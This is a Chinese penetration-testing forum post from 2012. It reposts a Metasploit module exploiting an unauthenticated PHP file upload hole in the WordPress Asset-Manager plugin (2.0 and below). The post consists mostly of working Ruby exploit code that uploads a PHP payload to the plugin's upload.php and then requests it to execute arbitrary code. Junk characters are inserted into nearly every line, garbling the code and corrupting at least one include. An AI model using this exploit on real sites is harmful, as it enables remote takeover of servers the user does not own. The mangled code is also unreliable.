找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2420|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。+ W& m' K7 g& p5 x# e
" ]" f1 p3 y6 F8 y0 A# t
##2 c" T: c- i; q, G! }* n  C! S2 z
# This file is part of the Metasploit Framework and may be subject to
6 v& m% @/ G2 J# redistribution and commercial restrictions. Please see the Metasploit
% u' u# H8 h& m/ G1 i* V4 b% w# Framework web site for more information on licensing and terms of use.
/ t) w$ n! Y4 w( g#   http://metasploit.com/framework/( E; n  ?& c  c' k; H$ q2 y5 ^
##8 [1 z8 t& ]( {& R  i2 z
) q0 \, r# n* Q  N) p# a' M. W
require 'msf/core'
( q5 o* M+ A3 l2 G' L& G5 j4 Hrequire 'msf/core/exploit/php_exe'/ v! C7 u" X8 G2 |1 j
: e$ N' `! k- d2 t0 @  ]
class Metasploit3 < Msf::Exploit::Remote. s; |1 v! D( E- `- B# ?
  Rank = ExcellentRanking4 P( h: Q( |; e' ?, h! v; l4 S
9 q- t# [1 J7 s' l% W1 T2 g
  include Msf::Exploit::Remote::HttpClient$ U8 i( K: s; M! f
  include Msf::Exploit:hpEXE
  J0 X# o# q2 w  j2 z2 [. U  C
1 `- v" Q1 b8 J+ Y# K1 S  def initialize(info = {}); u& D1 t0 c  V
    super(update_info(info,
# n9 z  n5 W* z, c      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',( w5 G4 O( B7 m$ b# Z1 e; A
      'Description'    => %q{
) Q% p, j; t4 D2 m* W* s' ]        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress0 K/ \/ Q; V5 o( q. B
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a: G) i5 K/ [* i- n( x+ f) `
        temp directory without authentication, which results in arbitrary code execution.* p) L  ?( z& F0 u# ]5 X: h  P
      },
8 b, O; Q1 F- L- c      'Author'         =>9 L- j" ]) B  ~. o2 w
        [2 x9 z0 ~' h* l. z( s
          'Sammy FORGIT', # initial discovery
2 n" R! @/ ^4 p) J, p$ p          'James Fitts <fitts.james[at]gmail.com>' # metasploit module- `9 }% [( ]! n# n, F! J
        ],( T1 h! U+ H9 a  v5 t/ z4 [' x4 l+ s
      'License'        => MSF_LICENSE,
8 Y- w9 K. P# a3 e      'References'     =>: _$ `1 v0 P- f% `
        [7 K7 s% K3 S3 y- `
          [ 'OSVDB', '82653' ],6 X: @8 _! S; A' g8 Y
          [ 'BID', '53809' ],1 x4 |) M" M- K
          [ 'EDB', '18993' ],. L+ I1 ~# d8 T5 A8 I& _! n- ^
          [ 'URL', 'http:// www.myhack58.com /' ]
: S& a2 Z/ X6 @) g* D        ],
- f! o2 T( w0 O% _* `) z      'Payload'       =>- o0 L8 @& H) X: B3 |
        {" @4 T9 |  ~" \( J" t
          'BadChars' => "\x00",9 M3 h( p; Y% s# m4 @3 N8 n; U- z
        },' ]5 P( Q* V! n( x/ n+ F& @
      'Platform'       => 'php',
3 c1 [5 I+ O0 R" D+ K+ `      'Arch'           => ARCH_PHP,
1 i7 a9 I, x/ B/ g% @* S      'Targets'        =>
6 ?, y% H/ C; I2 h        [/ O+ y0 {' M7 _0 ^+ K
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
" J7 i( I- A" E- G& [          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]1 E  a( [7 d% h4 C. y) S8 q
        ],5 K9 e3 Q  A) s; a7 @% Z- E
      'DefaultTarget' => 0,
; i! {( b+ W7 x( H      'DisclosureDate' => 'May 26 2012')). {- |5 @& d3 q* E9 w1 g4 S
# }% E/ A) ~. L' i8 B5 }: V
    register_options(9 z. b) a% a+ \4 `
      [
8 c4 _0 T% Z, D9 b! [2 M6 a        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
+ N! ?) P* G5 C      ], self.class)
& G5 ]5 k5 y; d% g  end
* w' q3 N/ v" V+ O/ c+ W7 F
9 y5 J, @9 J  n( O  def exploit' |, Q0 @8 X1 n* l
    uri =  target_uri.path9 U8 p" ^$ m. [5 z9 t$ r* J
    uri << '/' if uri[-1,1] != '/'0 R& t0 ?2 ~4 j
    peer = "#{rhost}:#{rport}"
! k3 J( ~! E( w    payload_name = "#{rand_text_alpha(5)}.php"
( f9 K3 P: X, Z    php_payload = get_write_exec_payload(:unlink_self=>true)
* ^0 c+ o5 K+ A3 [* D
  z' D7 z2 d2 T9 L  M    data = Rex::MIME::Message.new
! n2 ?. \. j3 G: A0 _    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")( G5 q( a% ~' e, e! g8 h) B
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')7 _1 _, x$ [% m1 D" U( r* U
; X* ^- y  Z2 {' {* |# P
    print_status("#{peer} - Uploading payload #{payload_name}")
0 z0 }1 ~6 W* O. f    res = send_request_cgi({8 \0 U& z( e5 w# C
      'method'  => 'POST',
5 v9 f5 ]4 k: G) s* V      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
9 H7 `. A' b! r8 x      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
0 K* V* g6 \+ F' ~      'data'    => post_data
7 |8 X" |' z2 x4 z: [& {  u- O4 f    })
: N5 w( \3 z5 K  J! H& \& ~5 r
3 D/ g& P0 [3 _8 \0 J# y    if not res or res.code != 200 or res.body !~ /#{payload_name}/
7 A; f1 B$ f8 W, g+ d      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
' p) p- k2 ]; l. T9 b2 f- hend: }' A( R+ D& ^2 V# D% C0 J7 [

: v' `# |  p5 C: z0 ?8 u( j    print_status("#{peer} - Executing payload #{payload_name}")
4 H5 D8 D6 \8 ~5 _# _( T    res = send_request_raw({- c3 J; R3 p# _  u  b
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
. D8 f! j% t& t  Q4 z      'method'  => 'GET'
3 d( C, m0 h! {6 H' L/ A* y( m) _    })
, i" y- e6 p2 D" M# O+ M # g' v3 {2 E- z2 I0 O. p
    if res and res.code != 200# {# [1 L& X5 `: r+ {  i
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")- R% m6 S* f* y7 E# W
    end
! F" |8 Z0 u# S9 q5 Z! f  end
, ^/ r: ?. L2 _+ y+ Iend
8 M& E" T( L; C) V0 ]0 N
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表